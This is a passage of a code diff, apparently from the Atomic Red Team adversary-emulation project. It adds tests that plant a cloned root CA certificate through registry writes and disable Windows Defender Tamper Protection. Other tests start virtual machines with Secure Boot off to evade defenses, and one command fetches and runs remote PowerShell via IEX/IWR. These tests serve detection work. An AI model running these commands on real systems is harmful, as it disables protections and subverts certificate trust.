+      Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
+    name: powershell
+    elevation_required: True

atomics/T1553.004/T1553.004.md

@@ -22,6 +22,8 @@ In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -
 
 - [Atomic Test #5 - Install root CA on Windows with certutil](#atomic-test-5---install-root-ca-on-windows-with-certutil)
 
+- [Atomic Test #6 - Add Root Certificate to CurrentUser Certificate Store](#atomic-test-6---add-root-certificate-to-currentuser-certificate-store)
+
 
 <br/>
 
@@ -271,4 +273,38 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Add Root Certificate to CurrentUser Certificate Store
+The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
+```
+
+#### Cleanup Commands:
+```powershell
+Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
+```
+
+
+
+
+
 <br/>

atomics/T1553.004/T1553.004.yaml

@@ -152,3 +152,18 @@ atomic_tests:
       } catch { }
     name: powershell
     elevation_required: true
+- name: Add Root Certificate to CurrentUser Certificate Store
+  auto_generated_guid: ca20a3f1-42b5-4e21-ad3f-1049199ec2e0
+  description: |
+    The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+    Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+    Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
+    cleanup_command: |
+       Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item 
+    name: powershell
+    elevation_required: true

atomics/T1553.004/src/RemoteCertTrust.ps1

@@ -0,0 +1,17 @@
+# Original https://gist.github.com/mattifestation/429008d961bb719d5bd5ce262557bdbf
+# Referenced blog: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+$CertThumbprint = '1F3D38F280635F275BE92B87CF83E40E40458400'
+$EncodedCertBlob = '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'
+
+Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName CreateKey -Arguments @{
+    hDefKey = [UInt32] 2147483650 # HKLM
+    sSubKeyName = "SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\$CertThumbprint"
+}
+
+Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName SetBinaryValue -Arguments @{
+    hDefKey = [UInt32] 2147483650 # HKLM
+    sSubKeyName = "SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\$CertThumbprint"
+    sValueName = 'Blob'
+    uValue = [Convert]::FromBase64String($EncodedCertBlob)
+}

atomics/T1562.001/T1562.001.md

@@ -58,6 +58,8 @@
 
 - [Atomic Test #27 - Disable Defender with Defender Control](#atomic-test-27---disable-defender-with-defender-control)
 
+- [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection)
+
 
 <br/>
 
@@ -1149,4 +1151,37 @@ expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$e
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #28 - Disable Windows Defender Tamper Protection
+Disabling Windows Defender tamper protection to allow attacks such as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f). Tamper Protection will be disabled after the next reboot.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5fde6578-9419-46ef-9258-269dc8656c3e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
+```
+
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.yaml

@@ -574,3 +574,15 @@ atomic_tests:
       cmd /c #{DefenderControlExe} /E | Out-Null
     name: powershell
     elevation_required: true
+- name: Disable Windows Defender Tamper Protection
+  auto_generated_guid: 5fde6578-9419-46ef-9258-269dc8656c3e
+  description: Disabling Windows Defender tamper protection to allow attacks such as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f). Tamper Protection will be disabled after the next reboot.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+      New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+    cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
+    name: powershell
+  

atomics/T1564.006/T1564.006.md

@@ -8,6 +8,10 @@ Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop
 
 - [Atomic Test #1 - Register Portable Virtualbox](#atomic-test-1---register-portable-virtualbox)
 
+- [Atomic Test #2 - Create and start VirtualBox virtual machine](#atomic-test-2---create-and-start-virtualbox-virtual-machine)
+
+- [Atomic Test #3 - Create and start Hyper-V virtual machine](#atomic-test-3---create-and-start-hyper-v-virtual-machine)
+
 
 <br/>
 
@@ -86,4 +90,133 @@ msiexec /i #{msi_file_path} /qn
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Create and start VirtualBox virtual machine
+Create a simple VirtualBox VM and start up the machine
+Cleanup command stops and deletes the newly created VM and associated files
+https://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm
+https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+https://attack.mitre.org/techniques/T1564/006/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 88b81702-a1c0-49a9-95b2-2dd53d755767
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_name | Name of the new virtual machine | String | Atomic VM|
+| virtualbox_exe | Path to the VirtualBox executable | Path | C:&#92;Program Files&#92;Oracle&#92;VirtualBox&#92;VirtualBox.exe|
+| vboxmanage_exe | Path to the executable for VBoxManage, the command-line interface to VirtualBox | Path | C:&#92;Program Files&#92;Oracle&#92;VirtualBox&#92;VBoxManage.exe|
+| virtualbox_download | URL for the current installer for the Windows version of VirtualBox, as of March 2022 | Url | https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe|
+| virtualbox_installer | Executable for the Virtualbox installer | String | VirtualBox-6.1.32-149290-Win.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{vboxmanage_exe}" createvm --name "#{vm_name}" --register
+"#{vboxmanage_exe}" modifyvm "#{vm_name}" --firmware efi
+"#{vboxmanage_exe}" startvm "#{vm_name}"
+```
+
+#### Cleanup Commands:
+```cmd
+"#{vboxmanage_exe}" controlvm "#{vm_name}" poweroff
+"#{vboxmanage_exe}" unregistervm "#{vm_name}" --delete
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: VirtualBox must exist on disk at specified locations (#{virtualbox_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "#{virtualbox_download}" -OutFile $env:TEMP\#{virtualbox_installer}
+$env:TEMP\#{virtualbox_installer}
+```
+##### Description: VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "#{virtualbox_download}" -OutFile $env:TEMP\#{virtualbox_installer}
+$env:TEMP\#{virtualbox_installer}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Create and start Hyper-V virtual machine
+Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine
+Cleanup command stops and deletes the newly created VM
+https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
+https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
+https://attack.mitre.org/techniques/T1564/006/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fb8d4d7e-f5a4-481c-8867-febf13f8b6d3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_name | Name of the new virtual machine | String | Atomic VM|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$VM = "#{vm_name}"
+New-VM -Name $VM -Generation 2
+Set-VMFirmware $VM -EnableSecureBoot Off
+Start-VM $VM
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-VM $VM -Force
+Remove-VM $VM -Force
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Hyper-V must be enabled on the system
+Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart
+##### Check Prereq Commands:
+```powershell
+if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = "Enabled") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force
+```
+
+
+
+
 <br/>

atomics/T1564.006/T1564.006.yaml

@@ -52,4 +52,94 @@ atomic_tests:
       regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
       msiexec /x #{msi_file_path} /qn
     name: command_prompt
-
+- name: Create and start VirtualBox virtual machine
+  auto_generated_guid: 88b81702-a1c0-49a9-95b2-2dd53d755767
+  description: |
+    Create a simple VirtualBox VM and start up the machine
+    Cleanup command stops and deletes the newly created VM and associated files
+    https://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm
+    https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+    https://attack.mitre.org/techniques/T1564/006/
+  supported_platforms:
+    - windows
+  input_arguments:
+    vm_name:
+      description: Name of the new virtual machine
+      type: String
+      default: Atomic VM
+    virtualbox_exe:
+      description: Path to the VirtualBox executable
+      type: Path
+      default: C:\Program Files\Oracle\VirtualBox\VirtualBox.exe
+    vboxmanage_exe:
+      description: Path to the executable for VBoxManage, the command-line interface to VirtualBox
+      type: Path
+      default: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe
+    virtualbox_download:
+      description: URL for the current installer for the Windows version of VirtualBox, as of March 2022
+      type: Url
+      default: https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe
+    virtualbox_installer:
+      description: Executable for the Virtualbox installer
+      type: String
+      default: VirtualBox-6.1.32-149290-Win.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      VirtualBox must exist on disk at specified locations (#{virtualbox_exe})
+    prereq_command: |
+      if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{virtualbox_download}" -OutFile $env:TEMP\#{virtualbox_installer}
+      $env:TEMP\#{virtualbox_installer}
+  - description: |
+      VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
+    prereq_command: |
+      if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{virtualbox_download}" -OutFile $env:TEMP\#{virtualbox_installer}
+      $env:TEMP\#{virtualbox_installer}
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      "#{vboxmanage_exe}" createvm --name "#{vm_name}" --register
+      "#{vboxmanage_exe}" modifyvm "#{vm_name}" --firmware efi
+      "#{vboxmanage_exe}" startvm "#{vm_name}"
+    cleanup_command: |-
+      "#{vboxmanage_exe}" controlvm "#{vm_name}" poweroff
+      "#{vboxmanage_exe}" unregistervm "#{vm_name}" --delete
+- name: Create and start Hyper-V virtual machine
+  auto_generated_guid: fb8d4d7e-f5a4-481c-8867-febf13f8b6d3
+  description: |
+    Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine
+    Cleanup command stops and deletes the newly created VM
+    https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
+    https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
+    https://attack.mitre.org/techniques/T1564/006/
+  supported_platforms:
+    - windows
+  input_arguments:
+    vm_name:
+      description: Name of the new virtual machine
+      type: String
+      default: Atomic VM
+  dependencies:
+    - description: |
+        Hyper-V must be enabled on the system
+        Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart
+      prereq_command: |
+        if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = "Enabled") {exit 0} else {exit 1}
+      get_prereq_command: |
+        Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |-
+      $VM = "#{vm_name}"
+      New-VM -Name $VM -Generation 2
+      Set-VMFirmware $VM -EnableSecureBoot Off
+      Start-VM $VM
+    cleanup_command: |-
+      Stop-VM $VM -Force
+      Remove-VM $VM -Force

atomics/used_guids.txt

@@ -677,7 +677,8 @@ bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c
 d34ef297-f178-4462-871e-9ce618d44e50
 23b91cd2-c99c-4002-9e41-317c63e024a2
 ff1d8c25-2aa4-4f18-a425-fede4a41ee88
-30558d53-9d76-41c4-9267-a7bd5184bed36ca45b04-9f15-4424-b9d3-84a217285a5c
+30558d53-9d76-41c4-9267-a7bd5184bed3
+6ca45b04-9f15-4424-b9d3-84a217285a5c
 e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
@@ -938,3 +939,11 @@ dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
 752191b1-7c71-445c-9dbe-21bb031b18eb
 1ee572f3-056c-4632-a7fc-7e7c42b1543c
+56506854-89d6-46a3-9804-b7fde90791f9
+88b81702-a1c0-49a9-95b2-2dd53d755767
+fb8d4d7e-f5a4-481c-8867-febf13f8b6d3
+5fde6578-9419-46ef-9258-269dc8656c3e
+0ae9e327-3251-465a-a53b-485d4e3f58fa
+1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
+c173c948-65e5-499c-afbe-433722ed5bd4
+ca20a3f1-42b5-4e21-ad3f-1049199ec2e0